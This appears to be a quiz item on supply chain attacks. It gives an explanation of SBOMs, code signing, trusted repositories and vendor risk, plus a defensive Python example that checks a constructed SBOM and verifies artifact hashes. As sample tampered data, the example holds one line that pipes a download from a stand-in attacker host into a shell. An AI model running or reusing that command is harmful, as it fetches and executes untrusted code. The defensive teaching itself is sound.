What is a supply chain attack and how can it be mitigated?


Multiple Choice

What is a supply chain attack and how can it be mitigated?

Explanation:

A supply chain attack compromises software or components somewhere between their origin and the end user: in a third-party dependency, a build or packaging step, an update channel, or a distributor. The product then arrives from a source the victim already trusts, carrying hidden malware or a deliberately planted vulnerability, so nothing about it looks suspicious. The defining issue is trust in the sources and in the build and delivery process, not how a network is attacked or what happens after a device is in the user's hands.

The mitigations listed fit because each one hardens a different link in that chain. An SBOM (Software Bill of Materials) is an inventory of every component and version that went into a product, which lets you match the product against vulnerability advisories and find risky or vulnerable pieces quickly when a new flaw is published. Code signing lets the consumer verify that an artifact was produced by the holder of a particular signing key and has not been altered since it was signed; the check is only as strong as the protection of that key and of the build that produced the artifact, so it catches tampering in transit rather than a compromised upstream. Trusted repositories, ideally combined with pinned versions and checksums, reduce the chance of pulling tampered or substituted components from unreliable sources. Vendor risk management addresses the wider supplier ecosystem: requiring security controls of third-party partners, monitoring them, and keeping contingency plans for the case where a supplier is compromised.
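The following is an added example, not part of the original explanation, showing what two of these mitigations look like when enforced in code: an SBOM audit that flags components matching an advisory feed or pulled from a repository outside an allowlist, and an artifact integrity check against a pinned SHA-256 digest of the kind a lockfile carries. The SBOM, the package names, the advisory version ranges, the artifact bytes and the trusted-host list are all constructed for the demonstration and are fictional; only the Python standard library is used.

```python
"""Supply-chain checks at dependency-install time (added example, constructed data).

Three checks are shown:
  1. SBOM components looked up against a (constructed) advisory feed.
  2. SBOM distribution URLs checked against an allowlist of trusted repositories.
  3. Downloaded artifact bytes verified against a pinned SHA-256 digest.
"""
import hashlib
import hmac
import json
from urllib.parse import urlparse

# Constructed CycloneDX-style SBOM for a fictional application; package names are invented.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "components": [
        {"name": "examplelib", "version": "1.2.0",
         "externalReferences": [{"type": "distribution",
                                 "url": "https://pypi.org/simple/examplelib/"}]},
        {"name": "fastparse", "version": "0.9.3",
         "externalReferences": [{"type": "distribution",
                                 "url": "https://pypi.org/simple/fastparse/"}]},
        {"name": "leftpad2", "version": "3.0.1",
         "externalReferences": [{"type": "distribution",
                                 "url": "https://mirror.example.net/simple/leftpad2/"}]},
    ],
})

# Constructed advisory feed: fictional packages, each entry an affected range [first, fixed).
ADVISORIES = {
    "examplelib": [("1.0.0", "1.3.0")],
    "fastparse": [("0.9.0", "0.9.3")],  # 0.9.3 is the fixed release, so it is not affected
}

# Repositories this build is allowed to fetch from (assumed policy for the example).
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org"}

# Constructed artifact bytes standing in for a downloaded sdist, plus a tampered copy.
GOOD_ARTIFACT = b"examplelib-1.2.0 source tarball (constructed sample bytes)\n"
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"import os; os.system('curl attacker.invalid | sh')\n"

# Lockfile entry: in practice the digest is recorded when the dependency is first vetted.
LOCKFILE = {"examplelib-1.2.0.tar.gz": hashlib.sha256(GOOD_ARTIFACT).hexdigest()}


def parse_version(version: str) -> tuple:
    """Turn '1.2.0' into (1, 2, 0) so ranges compare numerically, not lexically."""
    return tuple(int(part) for part in version.split("."))


def is_affected(name: str, version: str) -> bool:
    """True if the component version falls inside any advisory range for that package."""
    v = parse_version(version)
    return any(parse_version(lo) <= v < parse_version(hi)
               for lo, hi in ADVISORIES.get(name, []))


def audit_sbom(sbom_json: str) -> dict:
    """Map each SBOM component name to the list of issues found for it."""
    bom = json.loads(sbom_json)
    report = {}
    for comp in bom.get("components", []):
        issues = []
        if is_affected(comp["name"], comp["version"]):
            issues.append("known-vulnerable")
        for ref in comp.get("externalReferences", []):
            host = urlparse(ref["url"]).hostname
            if host not in TRUSTED_HOSTS:
                issues.append(f"untrusted-source:{host}")
        report[comp["name"]] = issues
    return report


def verify_artifact(filename: str, data: bytes, lockfile: dict = LOCKFILE) -> bool:
    """Accept the artifact only if its SHA-256 matches the pinned digest.

    An artifact with no pin is refused rather than silently accepted, and the
    comparison is constant-time so the check itself leaks nothing about the digest.
    """
    expected = lockfile.get(filename)
    if expected is None:
        return False
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected)


if __name__ == "__main__":
    for name, issues in audit_sbom(SAMPLE_SBOM).items():
        print(f"{name}: {issues or 'ok'}")
    print("good artifact:", verify_artifact("examplelib-1.2.0.tar.gz", GOOD_ARTIFACT))
    print("tampered artifact:", verify_artifact("examplelib-1.2.0.tar.gz", TAMPERED_ARTIFACT))
```

Running the script reports examplelib as known-vulnerable, fastparse as clean (it is on the fixed release), leftpad2 as fetched from an untrusted mirror, and rejects the tampered artifact because its digest no longer matches the pin. Real deployments would replace the constructed advisory feed with a vulnerability database lookup keyed on package URLs and would pair the hash pin with signature verification of the publisher's key.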

Options that focus on network traffic, on compromising a device after it has been delivered, or on hardware tampering describe other classes of attack and miss the defining feature of a supply chain attack: the software or component is compromised before it ever reaches the user.
